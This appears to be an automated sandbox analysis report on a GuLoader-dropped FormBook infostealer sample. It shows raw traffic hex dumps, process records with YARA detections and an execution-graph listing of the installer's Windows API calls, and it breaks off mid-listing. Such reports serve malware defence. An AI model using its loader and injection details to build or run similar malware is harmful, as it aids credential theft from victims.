                                                                                    Data Ascii: g.Xn'L.; 4 ;en3j]WT Z`6^F~]ulZ!x2N~atPRsTNi.UO)99f(H:"'1@D{NC"Hf%{{gNPZ_`~eKyL-m!b-!9oBeg27
                                                                                    2024-03-18 13:47:27 UTC1252INData Raw: 2d f4 9d 0d 28 35 76 da 8c a6 d7 94 b4 64 0e 43 db c3 56 5a 26 f5 da ea 8a 47 92 ab 70 a1 ec 44 c3 b2 bf 85 dd 05 a0 29 7a 0e d0 91 b6 d2 94 95 69 36 7f 9e f3 49 69 5d b1 4d 85 c0 ba 1a cc 94 3d 3f 9e 6e 84 fb a2 a7 5c b0 33 1d 22 4b 38 45 46 17 f5 40 95 99 3c 3a 23 38 bc 23 d1 57 9a 2e 20 3d 76 b2 90 ec 2e d0 95 70 38 05 4b ff 69 dc 86 85 94 f8 1d 7a f0 1a 8c fe 96 2b 4e 4c 6b 95 c6 9f 55 aa 95 d9 ea 58 e2 37 68 3c b1 a1 fb 6a 29 5a 66 89 95 47 94 37 8a 86 2d 54 92 a0 5f 20 c5 e8 73 dc 89 7d 19 e3 09 51 44 96 38 55 c9 53 ae 01 c4 54 28 f2 eb 00 f7 9d 20 cb f5 6a 11 0a f0 2b ee f5 20 d5 db f2 e0 27 4f 51 78 d3 68 99 5c 55 4d de ae fb a4 52 5a 72 61 9d db e7 49 bd b7 b5 ef 9e 8c 2a e2 93 3a be 94 ad 9c c7 5d 55 a9 14 a6 24 fe ea 77 17 dd 09 4f 69 37 bf ba
                                                                                    Data Ascii: -(5vdCVZ&GpD)zi6Ii]M=?n\3"K8EF@<:#8#W. =v.p8Kiz+NLkUX7h<j)ZfG7-T_ s}QD8UST( j+ 'OQxh\UMRZraI*:]U$wOi7
                                                                                    2024-03-18 13:47:27 UTC1252INData Raw: d1 b3 c4 7d e3 e1 11 85 54 b1 d1 56 7c 25 a7 4e 13 21 c1 78 58 c3 a6 9d ab 67 31 04 11 fc bf 87 32 63 f6 2c 97 fb e4 d8 ba e4 df 0a 5b 20 dd fb 3e 00 c2 22 48 1c 10 01 7f 45 c7 d8 da 07 80 e0 a1 ed 63 31 07 df ad bf e9 47 ed fd 29 c7 61 cc 61 11 d7 15 7c 2b 0f d6 65 fc f3 c9 a6 c2 98 59 53 fd 23 0a 74 f4 ac 97 e8 b7 96 f9 60 b6 58 61 ab 93 f3 a7 2f 91 c1 0f bb 18 52 96 6f ec d6 8f 2d e2 0a ad f5 3b a4 d1 98 bb af a4 59 8c 39 d9 ac c9 54 b6 29 d1 e1 7a 7d d9 e0 59 6c 9b aa 15 bc ec 49 43 61 46 fb 3d 49 e6 c6 43 67 0c 2c 7d c4 4b 9f 5f fe fd 41 79 73 f3 99 de 25 34 46 62 13 8b 46 dc 5f dd c4 6a 10 ae bd 0a 0a 8a 62 bc eb 21 d2 82 30 a5 79 3b bc 52 1c e8 9a 30 0b b6 94 87 b5 86 2d 92 b7 aa e6 b8 e9 33 3d aa f8 d0 5a 44 ba 92 c4 4a 51 79 f9 73 75 ab ec f9 5b
                                                                                    Data Ascii: }TV|%N!xXg12c,[ >"HEc1G)aa|+eYS#t`Xa/Ro-;Y9T)z}YlICaF=ICg,}K_Ays%4FbF_jb!0y;R0-3=ZDJQysu[


                                                                                    Statistics

                                                                                    CPU Usage

                                                                                    Click to jump to process

                                                                                    Memory Usage

                                                                                    Click to jump to process

                                                                                    Behavior

                                                                                    Click to jump to process

                                                                                    System Behavior

                                                                                    General

                                                                                    Target ID:0
                                                                                    Start time:14:46:52
                                                                                    Start date:18/03/2024
                                                                                    Path:C:\Users\user\Desktop\Grundforbedre39.exe
                                                                                    Wow64 process (32bit):true
                                                                                    Commandline:C:\Users\user\Desktop\Grundforbedre39.exe
                                                                                    Imagebase:0x400000
                                                                                    File size:786'800 bytes
                                                                                    MD5 hash:0190A49F09DC90C7DC61959581BE1E9F
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Yara matches:
                                                                                    • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000000.00000002.1134826419.000000000785E000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                    Reputation:low
                                                                                    Has exited:true

                                                                                    General

                                                                                    Target ID:4
                                                                                    Start time:14:47:17
                                                                                    Start date:18/03/2024
                                                                                    Path:C:\Users\user\Desktop\Grundforbedre39.exe
                                                                                    Wow64 process (32bit):true
                                                                                    Commandline:C:\Users\user\Desktop\Grundforbedre39.exe
                                                                                    Imagebase:0x400000
                                                                                    File size:786'800 bytes
                                                                                    MD5 hash:0190A49F09DC90C7DC61959581BE1E9F
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Yara matches:
                                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.1279164974.0000000038030000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.1279164974.0000000038030000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.1278316788.00000000351C0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.1278316788.00000000351C0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                    Reputation:low
                                                                                    Has exited:true

                                                                                    General

                                                                                    Target ID:9
                                                                                    Start time:14:47:31
                                                                                    Start date:18/03/2024
                                                                                    Path:C:\Program Files (x86)\ERtdTuDynHEWlexRohovBzgsqckTyNaQESBJWivIAgzOBz\aBVmlEGlXzPgSgzWbUWNbhsRlSOqo.exe
                                                                                    Wow64 process (32bit):true
                                                                                    Commandline:"C:\Program Files (x86)\ERtdTuDynHEWlexRohovBzgsqckTyNaQESBJWivIAgzOBz\aBVmlEGlXzPgSgzWbUWNbhsRlSOqo.exe"
                                                                                    Imagebase:0xa50000
                                                                                    File size:140'800 bytes
                                                                                    MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                    Has elevated privileges:false
                                                                                    Has administrator privileges:false
                                                                                    Programmed in:C, C++ or other language
                                                                                    Yara matches:
                                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000009.00000002.5892807319.0000000004CA0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000009.00000002.5892807319.0000000004CA0000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                                                                                    Reputation:high
                                                                                    Has exited:false

                                                                                    General

                                                                                    Target ID:10
                                                                                    Start time:14:47:32
                                                                                    Start date:18/03/2024
                                                                                    Path:C:\Windows\SysWOW64\netiougc.exe
                                                                                    Wow64 process (32bit):true
                                                                                    Commandline:C:\Windows\SysWOW64\netiougc.exe
                                                                                    Imagebase:0x830000
                                                                                    File size:25'600 bytes
                                                                                    MD5 hash:DD8D09523CDB5610078DF64BA4889806
                                                                                    Has elevated privileges:false
                                                                                    Has administrator privileges:false
                                                                                    Programmed in:C, C++ or other language
                                                                                    Yara matches:
                                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000A.00000002.5887373637.00000000004A0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000A.00000002.5887373637.00000000004A0000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000A.00000002.5894036244.0000000002B60000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000A.00000002.5894036244.0000000002B60000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000A.00000002.5893764662.0000000002B10000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000A.00000002.5893764662.0000000002B10000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                    Reputation:moderate
                                                                                    Has exited:false

                                                                                    General

                                                                                    Target ID:25
                                                                                    Start time:14:47:45
                                                                                    Start date:18/03/2024
                                                                                    Path:C:\Program Files (x86)\ERtdTuDynHEWlexRohovBzgsqckTyNaQESBJWivIAgzOBz\aBVmlEGlXzPgSgzWbUWNbhsRlSOqo.exe
                                                                                    Wow64 process (32bit):true
                                                                                    Commandline:"C:\Program Files (x86)\ERtdTuDynHEWlexRohovBzgsqckTyNaQESBJWivIAgzOBz\aBVmlEGlXzPgSgzWbUWNbhsRlSOqo.exe"
                                                                                    Imagebase:0xa50000
                                                                                    File size:140'800 bytes
                                                                                    MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                    Has elevated privileges:false
                                                                                    Has administrator privileges:false
                                                                                    Programmed in:C, C++ or other language
                                                                                    Yara matches:
                                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000019.00000002.5892016375.0000000000E30000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000019.00000002.5892016375.0000000000E30000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                                    Reputation:high
                                                                                    Has exited:false

                                                                                    General

                                                                                    Target ID:26
                                                                                    Start time:14:47:58
                                                                                    Start date:18/03/2024
                                                                                    Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:C:\Program Files\Mozilla Firefox\Firefox.exe
                                                                                    Imagebase:0x7ff77a870000
                                                                                    File size:597'432 bytes
                                                                                    MD5 hash:FA9F4FC5D7ECAB5A20BF7A9D1251C851
                                                                                    Has elevated privileges:false
                                                                                    Has administrator privileges:false
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:moderate
                                                                                    Has exited:true

                                                                                    Disassembly

                                                                                    Reset < >

                                                                                      Execution Graph

                                                                                      Execution Coverage:21.2%
                                                                                      Dynamic/Decrypted Code Coverage:13.7%
                                                                                      Signature Coverage:23.2%
                                                                                      Total number of Nodes:1536
                                                                                      Total number of Limit Nodes:44
                                                                                      execution_graph 5084 10001000 5087 1000101b 5084->5087 5094 10001516 5087->5094 5089 10001020 5090 10001024 5089->5090 5091 10001027 GlobalAlloc 5089->5091 5092 1000153d 3 API calls 5090->5092 5091->5090 5093 10001019 5092->5093 5096 1000151c 5094->5096 5095 10001522 5095->5089 5096->5095 5097 1000152e GlobalFree 5096->5097 5097->5089 5098 401cc0 5099 402ba2 18 API calls 5098->5099 5100 401cc7 5099->5100 5101 402ba2 18 API calls 5100->5101 5102 401ccf GetDlgItem 5101->5102 5103 402531 5102->5103 5104 4029c0 5105 402ba2 18 API calls 5104->5105 5106 4029c6 5105->5106 5107 4029f9 5106->5107 5108 40281e 5106->5108 5110 4029d4 5106->5110 5107->5108 5109 40603c 18 API calls 5107->5109 5109->5108 5110->5108 5112 405f61 wsprintfW 5110->5112 5112->5108 3994 401fc3 3995 401fd5 3994->3995 3996 402087 3994->3996 4017 402bbf 3995->4017 3999 401423 25 API calls 3996->3999 4005 4021e1 3999->4005 4000 402bbf 18 API calls 4001 401fe5 4000->4001 4002 401ffb LoadLibraryExW 4001->4002 4003 401fed GetModuleHandleW 4001->4003 4002->3996 4004 40200c 4002->4004 4003->4002 4003->4004 4023 406463 WideCharToMultiByte 4004->4023 4008 402056 4071 405179 4008->4071 4009 40201d 4011 402025 4009->4011 4012 40203c 4009->4012 4068 401423 4011->4068 4026 10001759 4012->4026 4014 40202d 4014->4005 4015 402079 FreeLibrary 4014->4015 4015->4005 4018 402bcb 4017->4018 4082 40603c 4018->4082 4021 401fdc 4021->4000 4024 40648d GetProcAddress 4023->4024 4025 402017 4023->4025 4024->4025 4025->4008 4025->4009 4027 10001789 4026->4027 4121 10001b18 4027->4121 4029 10001790 4030 100018a6 4029->4030 4031 100017a1 4029->4031 4032 100017a8 4029->4032 4030->4014 4170 10002286 4031->4170 4153 100022d0 4032->4153 4037 1000180c 4043 10001812 4037->4043 4044 1000184e 4037->4044 4038 100017ee 4183 100024a9 4038->4183 4039 100017d7 4053 100017cd 4039->4053 4180 10002b5f 4039->4180 4040 100017be 4042 100017c4 4040->4042 4046 100017cf 4040->4046 4042->4053 4164 100028a4 4042->4164 4048 100015b4 3 API calls 4043->4048 4050 100024a9 10 API calls 4044->4050 4045 100017f4 4194 100015b4 4045->4194 4174 10002645 4046->4174 4055 10001828 4048->4055 4051 10001840 4050->4051 4067 10001895 4051->4067 4205 1000246c 4051->4205 4053->4037 4053->4038 4058 100024a9 10 API calls 4055->4058 4057 100017d5 4057->4053 4058->4051 4062 1000189f GlobalFree 4062->4030 4064 10001881 4064->4067 4209 1000153d wsprintfW 4064->4209 4065 1000187a FreeLibrary 4065->4064 4067->4030 4067->4062 4069 405179 25 API calls 4068->4069 4070 401431 4069->4070 4070->4014 4072 405194 4071->4072 4073 405236 4071->4073 4074 4051b0 lstrlenW 4072->4074 4075 40603c 18 API calls 4072->4075 4073->4014 4076 4051d9 4074->4076 4077 4051be lstrlenW 4074->4077 4075->4074 4079 4051ec 4076->4079 4080 4051df SetWindowTextW 4076->4080 4077->4073 4078 4051d0 lstrcatW 4077->4078 4078->4076 4079->4073 4081 4051f2 SendMessageW SendMessageW SendMessageW 4079->4081 4080->4079 4081->4073 4087 406049 4082->4087 4083 406294 4084 402bec 4083->4084 4116 40601a lstrcpynW 4083->4116 4084->4021 4100 4062ae 4084->4100 4086 4060fc GetVersion 4086->4087 4087->4083 4087->4086 4088 406262 lstrlenW 4087->4088 4091 40603c 10 API calls 4087->4091 4093 406177 GetSystemDirectoryW 4087->4093 4094 40618a GetWindowsDirectoryW 4087->4094 4095 4062ae 5 API calls 4087->4095 4096 4061be SHGetSpecialFolderLocation 4087->4096 4097 40603c 10 API calls 4087->4097 4098 406203 lstrcatW 4087->4098 4109 405ee7 RegOpenKeyExW 4087->4109 4114 405f61 wsprintfW 4087->4114 4115 40601a lstrcpynW 4087->4115 4088->4087 4091->4088 4093->4087 4094->4087 4095->4087 4096->4087 4099 4061d6 SHGetPathFromIDListW CoTaskMemFree 4096->4099 4097->4087 4098->4087 4099->4087 4107 4062bb 4100->4107 4101 406331 4102 406336 CharPrevW 4101->4102 4104 406357 4101->4104 4102->4101 4103 406324 CharNextW 4103->4101 4103->4107 4104->4021 4106 406310 CharNextW 4106->4107 4107->4101 4107->4103 4107->4106 4108 40631f CharNextW 4107->4108 4117 4059fb 4107->4117 4108->4103 4110 405f5b 4109->4110 4111 405f1b RegQueryValueExW 4109->4111 4110->4087 4112 405f3c RegCloseKey 4111->4112 4112->4110 4114->4087 4115->4087 4116->4084 4118 405a01 4117->4118 4119 405a17 4118->4119 4120 405a08 CharNextW 4118->4120 4119->4107 4120->4118 4212 1000121b GlobalAlloc 4121->4212 4123 10001b3c 4213 1000121b GlobalAlloc 4123->4213 4125 10001d7a GlobalFree GlobalFree GlobalFree 4126 10001d97 4125->4126 4145 10001de1 4125->4145 4127 100020ee 4126->4127 4136 10001dac 4126->4136 4126->4145 4129 10002110 GetModuleHandleW 4127->4129 4127->4145 4128 10001c1d GlobalAlloc 4150 10001b47 4128->4150 4132 10002121 LoadLibraryW 4129->4132 4133 10002136 4129->4133 4130 10001c68 lstrcpyW 4134 10001c72 lstrcpyW 4130->4134 4131 10001c86 GlobalFree 4131->4150 4132->4133 4132->4145 4220 100015ff WideCharToMultiByte GlobalAlloc WideCharToMultiByte GetProcAddress GlobalFree 4133->4220 4134->4150 4136->4145 4216 1000122c 4136->4216 4137 10002188 4138 10002195 lstrlenW 4137->4138 4137->4145 4221 100015ff WideCharToMultiByte GlobalAlloc WideCharToMultiByte GetProcAddress GlobalFree 4138->4221 4140 10002148 4140->4137 4152 10002172 GetProcAddress 4140->4152 4141 10002048 4144 10002090 lstrcpyW 4141->4144 4141->4145 4144->4145 4145->4029 4146 10001cc4 4146->4150 4214 1000158f GlobalSize GlobalAlloc 4146->4214 4147 10001f37 GlobalFree 4147->4150 4148 100021af 4148->4145 4150->4125 4150->4128 4150->4130 4150->4131 4150->4134 4150->4141 4150->4145 4150->4146 4150->4147 4151 1000122c 2 API calls 4150->4151 4219 1000121b GlobalAlloc 4150->4219 4151->4150 4152->4137 4155 100022e8 4153->4155 4154 1000122c GlobalAlloc lstrcpynW 4154->4155 4155->4154 4157 10002415 GlobalFree 4155->4157 4158 100023d3 lstrlenW 4155->4158 4159 100023ba GlobalAlloc CLSIDFromString 4155->4159 4160 1000238f GlobalAlloc WideCharToMultiByte 4155->4160 4223 100012ba 4155->4223 4157->4155 4161 100017ae 4157->4161 4158->4157 4163 100023de 4158->4163 4159->4157 4160->4157 4161->4039 4161->4040 4161->4053 4163->4157 4227 100025d9 4163->4227 4165 100028b6 4164->4165 4166 1000295b VirtualAlloc 4165->4166 4167 10002979 4166->4167 4168 10002a75 4167->4168 4169 10002a6a GetLastError 4167->4169 4168->4053 4169->4168 4171 10002296 4170->4171 4172 100017a7 4170->4172 4171->4172 4173 100022a8 GlobalAlloc 4171->4173 4172->4032 4173->4171 4178 10002661 4174->4178 4175 100026b2 GlobalAlloc 4179 100026d4 4175->4179 4176 100026c5 4177 100026ca GlobalSize 4176->4177 4176->4179 4177->4179 4178->4175 4178->4176 4179->4057 4181 10002b6a 4180->4181 4182 10002baa GlobalFree 4181->4182 4230 1000121b GlobalAlloc 4183->4230 4185 10002530 StringFromGUID2 4191 100024b3 4185->4191 4186 10002541 lstrcpynW 4186->4191 4187 1000250b MultiByteToWideChar 4187->4191 4188 10002554 wsprintfW 4188->4191 4189 10002571 GlobalFree 4189->4191 4190 100025ac GlobalFree 4190->4045 4191->4185 4191->4186 4191->4187 4191->4188 4191->4189 4191->4190 4192 10001272 2 API calls 4191->4192 4231 100012e1 4191->4231 4192->4191 4235 1000121b GlobalAlloc 4194->4235 4196 100015ba 4197 100015c7 lstrcpyW 4196->4197 4198 100015e1 4196->4198 4201 100015fb 4197->4201 4200 100015e6 wsprintfW 4198->4200 4198->4201 4200->4201 4202 10001272 4201->4202 4203 100012b5 GlobalFree 4202->4203 4204 1000127b GlobalAlloc lstrcpynW 4202->4204 4203->4051 4204->4203 4206 10001861 4205->4206 4207 1000247a 4205->4207 4206->4064 4206->4065 4207->4206 4208 10002496 GlobalFree 4207->4208 4208->4207 4210 10001272 2 API calls 4209->4210 4211 1000155e 4210->4211 4211->4067 4212->4123 4213->4150 4215 100015ad 4214->4215 4215->4146 4222 1000121b GlobalAlloc 4216->4222 4218 1000123b lstrcpynW 4218->4145 4219->4150 4220->4140 4221->4148 4222->4218 4224 100012c1 4223->4224 4225 1000122c 2 API calls 4224->4225 4226 100012df 4225->4226 4226->4155 4228 100025e7 VirtualAlloc 4227->4228 4229 1000263d 4227->4229 4228->4229 4229->4163 4230->4191 4232 100012ea 4231->4232 4233 1000130c 4231->4233 4232->4233 4234 100012f0 lstrcpyW 4232->4234 4233->4191 4234->4233 4235->4196 5113 4016c4 5114 402bbf 18 API calls 5113->5114 5115 4016ca GetFullPathNameW 5114->5115 5116 4016e4 5115->5116 5117 401706 5115->5117 5116->5117 5120 40635d 2 API calls 5116->5120 5118 40171b GetShortPathNameW 5117->5118 5119 402a4c 5117->5119 5118->5119 5121 4016f6 5120->5121 5121->5117 5123 40601a lstrcpynW 5121->5123 5123->5117 5134 40194e 5135 402bbf 18 API calls 5134->5135 5136 401955 lstrlenW 5135->5136 5137 402531 5136->5137 5138 4027ce 5139 4027d6 5138->5139 5140 4027da FindNextFileW 5139->5140 5143 4027ec 5139->5143 5141 402833 5140->5141 5140->5143 5144 40601a lstrcpynW 5141->5144 5144->5143 5145 4048cf 5146 4048fb 5145->5146 5147 4048df 5145->5147 5149 404901 SHGetPathFromIDListW 5146->5149 5150 40492e 5146->5150 5156 405743 GetDlgItemTextW 5147->5156 5152 404911 5149->5152 5153 404918 SendMessageW 5149->5153 5151 4048ec SendMessageW 5151->5146 5154 40140b 2 API calls 5152->5154 5153->5150 5154->5153 5156->5151 4905 401754 4906 402bbf 18 API calls 4905->4906 4907 40175b 4906->4907 4908 405c1e 2 API calls 4907->4908 4909 401762 4908->4909 4910 405c1e 2 API calls 4909->4910 4910->4909 5164 401d56 GetDC GetDeviceCaps 5165 402ba2 18 API calls 5164->5165 5166 401d74 MulDiv ReleaseDC 5165->5166 5167 402ba2 18 API calls 5166->5167 5168 401d93 5167->5168 5169 40603c 18 API calls 5168->5169 5170 401dcc CreateFontIndirectW 5169->5170 5171 402531 5170->5171 5172 401a57 5173 402ba2 18 API calls 5172->5173 5174 401a5d 5173->5174 5175 402ba2 18 API calls 5174->5175 5176 401a05 5175->5176 5177 4014d7 5178 402ba2 18 API calls 5177->5178 5179 4014dd Sleep 5178->5179 5181 402a4c 5179->5181 5182 40155b 5183 4029f2 5182->5183 5186 405f61 wsprintfW 5183->5186 5185 4029f7 5186->5185 5014 401ddc 5015 402ba2 18 API calls 5014->5015 5016 401de2 5015->5016 5017 402ba2 18 API calls 5016->5017 5018 401deb 5017->5018 5019 401df2 ShowWindow 5018->5019 5020 401dfd EnableWindow 5018->5020 5021 402a4c 5019->5021 5020->5021 5055 401bdf 5056 402ba2 18 API calls 5055->5056 5057 401be6 5056->5057 5058 402ba2 18 API calls 5057->5058 5059 401bf0 5058->5059 5060 401c00 5059->5060 5061 402bbf 18 API calls 5059->5061 5062 402bbf 18 API calls 5060->5062 5066 401c10 5060->5066 5061->5060 5062->5066 5063 401c1b 5067 402ba2 18 API calls 5063->5067 5064 401c5f 5065 402bbf 18 API calls 5064->5065 5068 401c64 5065->5068 5066->5063 5066->5064 5069 401c20 5067->5069 5070 402bbf 18 API calls 5068->5070 5071 402ba2 18 API calls 5069->5071 5073 401c6d FindWindowExW 5070->5073 5072 401c29 5071->5072 5074 401c31 SendMessageTimeoutW 5072->5074 5075 401c4f SendMessageW 5072->5075 5076 401c8f 5073->5076 5074->5076 5075->5076 5077 4022df 5078 402bbf 18 API calls 5077->5078 5079 4022ee 5078->5079 5080 402bbf 18 API calls 5079->5080 5081 4022f7 5080->5081 5082 402bbf 18 API calls 5081->5082 5083 402301 GetPrivateProfileStringW 5082->5083 5187 401960 5188 402ba2 18 API calls 5187->5188 5189 401967 5188->5189 5190 402ba2 18 API calls 5189->5190 5191 401971 5190->5191 5192 402bbf 18 API calls 5191->5192 5193 40197a 5192->5193 5194 40198e lstrlenW 5193->5194 5195 4019ca 5193->5195 5196 401998 5194->5196 5196->5195 5200 40601a lstrcpynW 5196->5200 5198 4019b3 5198->5195 5199 4019c0 lstrlenW 5198->5199 5199->5195 5200->5198 5201 401662 5202 402bbf 18 API calls 5201->5202 5203 401668 5202->5203 5204 40635d 2 API calls 5203->5204 5205 40166e 5204->5205 5206 4066e2 5208 406566 5206->5208 5207 406ed1 5208->5207 5209 4065f0 GlobalAlloc 5208->5209 5210 4065e7 GlobalFree 5208->5210 5211 406667 GlobalAlloc 5208->5211 5212 40665e GlobalFree 5208->5212 5209->5207 5209->5208 5210->5209 5211->5207 5211->5208 5212->5211 5213 4019e4 5214 402bbf 18 API calls 5213->5214 5215 4019eb 5214->5215 5216 402bbf 18 API calls 5215->5216 5217 4019f4 5216->5217 5218 4019fb lstrcmpiW 5217->5218 5219 401a0d lstrcmpW 5217->5219 5220 401a01 5218->5220 5219->5220 4236 4025e5 4250 402ba2 4236->4250 4238 40272d 4239 4025f4 4239->4238 4240 40263a ReadFile 4239->4240 4241 4026d3 4239->4241 4243 40267a MultiByteToWideChar 4239->4243 4244 40272f 4239->4244 4247 4026a0 SetFilePointer MultiByteToWideChar 4239->4247 4248 402740 4239->4248 4262 405c72 ReadFile 4239->4262 4240->4238 4240->4239 4241->4238 4241->4239 4253 405cd0 SetFilePointer 4241->4253 4243->4239 4264 405f61 wsprintfW 4244->4264 4247->4239 4248->4238 4249 402761 SetFilePointer 4248->4249 4249->4238 4251 40603c 18 API calls 4250->4251 4252 402bb6 4251->4252 4252->4239 4254 405cec 4253->4254 4255 405d08 4253->4255 4256 405c72 ReadFile 4254->4256 4255->4241 4257 405cf8 4256->4257 4257->4255 4258 405d11 SetFilePointer 4257->4258 4259 405d39 SetFilePointer 4257->4259 4258->4259 4260 405d1c 4258->4260 4259->4255 4265 405ca1 WriteFile 4260->4265 4263 405c90 4262->4263 4263->4239 4264->4238 4266 405cbf 4265->4266 4266->4255 4267 401e66 4268 402bbf 18 API calls 4267->4268 4269 401e6c 4268->4269 4270 405179 25 API calls 4269->4270 4271 401e76 4270->4271 4285 4056fa CreateProcessW 4271->4285 4274 401edb CloseHandle 4278 40281e 4274->4278 4275 401e8c WaitForSingleObject 4276 401e9e 4275->4276 4277 401eb0 GetExitCodeProcess 4276->4277 4288 406430 4276->4288 4279 401ec2 4277->4279 4280 401ecf 4277->4280 4292 405f61 wsprintfW 4279->4292 4280->4274 4283 401ecd 4280->4283 4283->4274 4286 401e7c 4285->4286 4287 40572d CloseHandle 4285->4287 4286->4274 4286->4275 4286->4278 4287->4286 4289 40644d PeekMessageW 4288->4289 4290 406443 DispatchMessageW 4289->4290 4291 401ea5 WaitForSingleObject 4289->4291 4290->4289 4291->4276 4292->4283 4405 401767 4406 402bbf 18 API calls 4405->4406 4407 40176e 4406->4407 4408 401796 4407->4408 4409 40178e 4407->4409 4467 40601a lstrcpynW 4408->4467 4466 40601a lstrcpynW 4409->4466 4412 401794 4416 4062ae 5 API calls 4412->4416 4413 4017a1 4468 4059ce lstrlenW CharPrevW 4413->4468 4424 4017b3 4416->4424 4418 4017ef 4474 405bca GetFileAttributesW 4418->4474 4421 4017c5 CompareFileTime 4421->4424 4422 401885 4423 405179 25 API calls 4422->4423 4425 40188f 4423->4425 4424->4418 4424->4421 4424->4422 4427 40601a lstrcpynW 4424->4427 4431 40603c 18 API calls 4424->4431 4441 40185c 4424->4441 4444 405bef GetFileAttributesW CreateFileW 4424->4444 4471 40635d FindFirstFileW 4424->4471 4477 40575f 4424->4477 4445 403027 4425->4445 4426 405179 25 API calls 4443 401871 4426->4443 4427->4424 4430 4018b6 SetFileTime 4432 4018c8 CloseHandle 4430->4432 4431->4424 4433 4018d9 4432->4433 4432->4443 4434 4018f1 4433->4434 4435 4018de 4433->4435 4437 40603c 18 API calls 4434->4437 4436 40603c 18 API calls 4435->4436 4439 4018e6 lstrcatW 4436->4439 4440 4018f9 4437->4440 4439->4440 4442 40575f MessageBoxIndirectW 4440->4442 4441->4426 4441->4443 4442->4443 4444->4424 4447 403040 4445->4447 4446 40306b 4481 40320c 4446->4481 4447->4446 4491 403222 SetFilePointer 4447->4491 4451 403088 GetTickCount 4462 40309b 4451->4462 4452 4031ac 4453 4031b0 4452->4453 4457 4031c8 4452->4457 4455 40320c ReadFile 4453->4455 4454 4018a2 4454->4430 4454->4432 4455->4454 4456 40320c ReadFile 4456->4457 4457->4454 4457->4456 4459 405ca1 WriteFile 4457->4459 4458 40320c ReadFile 4458->4462 4459->4457 4461 403101 GetTickCount 4461->4462 4462->4454 4462->4458 4462->4461 4463 40312a MulDiv wsprintfW 4462->4463 4465 405ca1 WriteFile 4462->4465 4484 406533 4462->4484 4464 405179 25 API calls 4463->4464 4464->4462 4465->4462 4466->4412 4467->4413 4469 4017a7 lstrcatW 4468->4469 4470 4059ea lstrcatW 4468->4470 4469->4412 4470->4469 4472 406373 FindClose 4471->4472 4473 40637e 4471->4473 4472->4473 4473->4424 4475 405be9 4474->4475 4476 405bdc SetFileAttributesW 4474->4476 4475->4424 4476->4475 4478 405774 4477->4478 4479 4057c0 4478->4479 4480 405788 MessageBoxIndirectW 4478->4480 4479->4424 4480->4479 4482 405c72 ReadFile 4481->4482 4483 403076 4482->4483 4483->4451 4483->4452 4483->4454 4485 406558 4484->4485 4486 406560 4484->4486 4485->4462 4486->4485 4487 4065f0 GlobalAlloc 4486->4487 4488 4065e7 GlobalFree 4486->4488 4489 406667 GlobalAlloc 4486->4489 4490 40665e GlobalFree 4486->4490 4487->4485 4487->4486 4488->4487 4489->4485 4489->4486 4490->4489 4491->4446 5221 401ee9 5222 402bbf 18 API calls 5221->5222 5223 401ef0 5222->5223 5224 40635d 2 API calls 5223->5224 5225 401ef6 5224->5225 5227 401f07 5225->5227 5228 405f61 wsprintfW 5225->5228 5228->5227 5229 100018a9 5230 100018cc 5229->5230 5231 100018ff GlobalFree 5230->5231 5232 10001911 5230->5232 5231->5232 5233 10001272 2 API calls 5232->5233 5234 10001a87 GlobalFree GlobalFree 5233->5234 4495 40326a SetErrorMode GetVersion 4496 4032a5 4495->4496 4497 40329f 4495->4497 4583 406384 GetSystemDirectoryW 4496->4583 4498 4063f4 5 API calls 4497->4498 4498->4496 4500 4032bb lstrlenA 4500->4496 4501 4032cb 4500->4501 4586 4063f4 GetModuleHandleA 4501->4586 4504 4063f4 5 API calls 4505 4032da #17 OleInitialize SHGetFileInfoW 4504->4505 4592 40601a lstrcpynW 4505->4592 4507 403317 GetCommandLineW 4593 40601a lstrcpynW 4507->4593 4509 403329 GetModuleHandleW 4510 403341 4509->4510 4511 4059fb CharNextW 4510->4511 4512 403350 CharNextW 4511->4512 4513 40347a GetTempPathW 4512->4513 4520 403369 4512->4520 4594 403239 4513->4594 4515 403492 4516 403496 